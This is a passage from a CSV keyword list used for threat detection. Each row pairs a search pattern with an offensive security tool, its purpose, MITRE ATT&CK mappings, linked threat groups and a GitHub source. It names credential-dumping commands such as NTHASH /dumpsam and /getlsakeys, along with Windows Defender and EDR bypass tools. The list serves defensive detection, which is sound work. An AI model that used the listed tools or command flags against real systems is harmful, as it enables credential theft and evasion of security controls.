"*nsa-rules-master*",".{0,1000}nsa\-rules\-master.{0,1000}","offensive_tool_keyword","nsa-rules","Password cracking rules and masks for hashcat that I generated from cracked passwords.","T1110.002 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/NSAKEY/nsa-rules","1","1","N/A","N/A","10","6","547","125","2017-01-03T11:53:25Z","2016-02-15T20:49:32Z","53611"
"*nselib/data/passwords.lst*",".{0,1000}nselib\/data\/passwords\.lst.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","53616"
"*NS-Sp4ce/CVE-2021-21972*",".{0,1000}NS\-Sp4ce\/CVE\-2021\-21972.{0,1000}","offensive_tool_keyword","POC","CVE-2021-21972 POC exploitation","T1190 - T1059.001 - T1040","TA0001 - TA0003 - TA0009","N/A","Dispossessor","Exploitation tool","https://github.com/NS-Sp4ce/CVE-2021-21972","1","1","N/A","N/A","7","5","491","146","2023-06-08T04:01:33Z","2021-02-24T11:14:58Z","53619"
"*NSudo -U:T -ShowWindowMode:Hide*",".{0,1000}NSudo\s\-U\:T\s\-ShowWindowMode\:Hide.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection  - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","53620"
"*NT AUTHOIRTY\SYSTEM*",".{0,1000}NT\sAUTHOIRTY\\SYSTEM.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","N/A","N/A","9","4","336","46","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z","53621"
"*ntcreatethread.x64*",".{0,1000}ntcreatethread\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","53622"
"*ntcreatethread.x86*",".{0,1000}ntcreatethread\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","53623"
"*NtCreateUserProcessShellcode*",".{0,1000}NtCreateUserProcessShellcode.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Metro-Holografix/DInjector","1","0","N/A","private github repo","8","","N/A","","","","53624"
"*ntdissector -*",".{0,1000}ntdissector\s\-.{0,1000}","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","N/A","9","2","139","17","2024-08-16T14:18:35Z","2023-09-05T12:13:47Z","53625"
"*ntdissector-main*",".{0,1000}ntdissector\-main.{0,1000}","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","1","N/A","N/A","9","2","139","17","2024-08-16T14:18:35Z","2023-09-05T12:13:47Z","53626"
"*Ntdll_SusProcess.*",".{0,1000}Ntdll_SusProcess\..{0,1000}","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","1","N/A","N/A","9","2","188","38","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z","53627"
"*NTDLLReflection-main*",".{0,1000}NTDLLReflection\-main.{0,1000}","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","N/A","9","3","293","45","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z","53628"
"*NtdllUnpatcher.cpp*",".{0,1000}NtdllUnpatcher\.cpp.{0,1000}","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","N/A","10","2","150","33","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z","53629"
"*NtdllUnpatcher.dll*",".{0,1000}NtdllUnpatcher\.dll.{0,1000}","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","N/A","10","2","150","33","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z","53630"
"*NtdllUnpatcher.lib*",".{0,1000}NtdllUnpatcher\.lib.{0,1000}","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","N/A","10","2","150","33","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z","53631"
"*NtdllUnpatcher.log*",".{0,1000}NtdllUnpatcher\.log.{0,1000}","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","#logfile","N/A","10","2","150","33","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z","53632"
"*NtdllUnpatcher.obj*",".{0,1000}NtdllUnpatcher\.obj.{0,1000}","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","N/A","10","2","150","33","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z","53633"
"*NtdllUnpatcher.sln*",".{0,1000}NtdllUnpatcher\.sln.{0,1000}","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","N/A","10","2","150","33","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z","53634"
"*NtdllUnpatcher_Injector*",".{0,1000}NtdllUnpatcher_Injector.{0,1000}","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","N/A","10","2","150","33","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z","53635"
"*NtdllUnpatcher-master*",".{0,1000}NtdllUnpatcher\-master.{0,1000}","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","N/A","10","2","150","33","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z","53636"
"*ntds/ntds.py*",".{0,1000}ntds\/ntds\.py.{0,1000}","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","N/A","9","2","139","17","2024-08-16T14:18:35Z","2023-09-05T12:13:47Z","53637"
"*ntds_grabber.md*",".{0,1000}ntds_grabber\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","53638"
"*ntdsdump.exe*",".{0,1000}ntdsdump\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","53639"
"*NTDSgrab.ps1*",".{0,1000}NTDSgrab\.ps1.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","53640"
"*NTDSHashes.dump*",".{0,1000}NTDSHashes\.dump.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","53641"
"*ntfs-read.py*",".{0,1000}ntfs\-read\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Sniffing & Spoofing","https://github.com/SecureAuthCorp/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","53653"
"*nth --text 5f4dcc3b5aa765d61d8327deb882cf99*",".{0,1000}nth\s\-\-text\s5f4dcc3b5aa765d61d8327deb882cf99.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","53654"
"*NTHASH /enumproc *",".{0,1000}NTHASH\s\/enumproc\s.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","53655"
"*NTHASH /runas *",".{0,1000}NTHASH\s\/runas\s.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","53656"
"*NTHASH /runaschild /pid*",".{0,1000}NTHASH\s\/runaschild\s\/pid.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","53657"
"*NTHASH /runastoken *",".{0,1000}NTHASH\s\/runastoken\s.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","53658"
"*NTHASH /runwmi *",".{0,1000}NTHASH\s\/runwmi\s.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","53659"
"*NTHASH* /cryptunprotectdata /binary:*",".{0,1000}NTHASH.{0,1000}\s\/cryptunprotectdata\s\/binary\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","53660"
"*NTHASH* /cryptunprotectdata /input:*",".{0,1000}NTHASH.{0,1000}\s\/cryptunprotectdata\s\/input\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","53661"
"*NTHASH* /dumpsam*",".{0,1000}NTHASH.{0,1000}\s\/dumpsam.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","53662"
"*NTHASH* /enumcred*",".{0,1000}NTHASH.{0,1000}\s\/enumcred.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","53663"
"*NTHASH* /enumvault*",".{0,1000}NTHASH.{0,1000}\s\/enumvault.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","53664"
"*NTHASH* /getlsakeys*",".{0,1000}NTHASH.{0,1000}\s\/getlsakeys.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","53665"
"*NTHASH* /wlansvc /binary:*",".{0,1000}NTHASH.{0,1000}\s\/wlansvc\s\/binary\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","53666"
"*NTHASH-win32.exe*",".{0,1000}NTHASH\-win32\.exe.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","53667"
"*NTHASH-win64.exe*",".{0,1000}NTHASH\-win64\.exe.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","53668"
"*NTLM credentials successfully changed!*",".{0,1000}NTLM\scredentials\ssuccessfully\schanged!.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","#content","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","53669"
"*NTLM credentials successfully deleted!*",".{0,1000}NTLM\scredentials\ssuccessfully\sdeleted!.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","#content","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","53670"
"*NTLM TlRMTVNTUAACAAAABgAGADgAAAAFAomiESIzRFVmd4gAAAAAAAAAAIAAgAA+AAAABQLODgAAAA9TAE0AQgACAAYAUwBNAEIAAQAWAFMATQBCAC0AVABPAE8ATABLAEkAVAAEABIAcwBtAGIALgBsAG8AYwBhAGwAAwAoAHMAZQByAHYAZQByADIAMAAwADMALgBzAG0AYgAuAGwAbwBjAGEAbAAFABIAcwBtAGIALgBsAG8AYwBhAGwAAAAAAA==*",".{0,1000}NTLM\sTlRMTVNTUAACAAAABgAGADgAAAAFAomiESIzRFVmd4gAAAAAAAAAAIAAgAA\+AAAABQLODgAAAA9TAE0AQgACAAYAUwBNAEIAAQAWAFMATQBCAC0AVABPAE8ATABLAEkAVAAEABIAcwBtAGIALgBsAG8AYwBhAGwAAwAoAHMAZQByAHYAZQByADIAMAAwADMALgBzAG0AYgAuAGwAbwBjAGEAbAAFABIAcwBtAGIALgBsAG8AYwBhAGwAAAAAAA\=\=.{0,1000}","offensive_tool_keyword","Get-NetNTLM","Powershell module to get the NetNTLMv2 hash of the current user","T1110.003 - T1557.001 - T1040","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/elnerd/Get-NetNTLM","1","0","#content","N/A","7","1","93","18","2022-07-05T20:55:33Z","2019-02-11T23:09:54Z","53671"
"*ntlm.py *",".{0,1000}ntlm\.py\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","53672"
"*ntlm_info_enumeration.*",".{0,1000}ntlm_info_enumeration\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","53673"
"*NTLMChallengeBase64*",".{0,1000}NTLMChallengeBase64.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 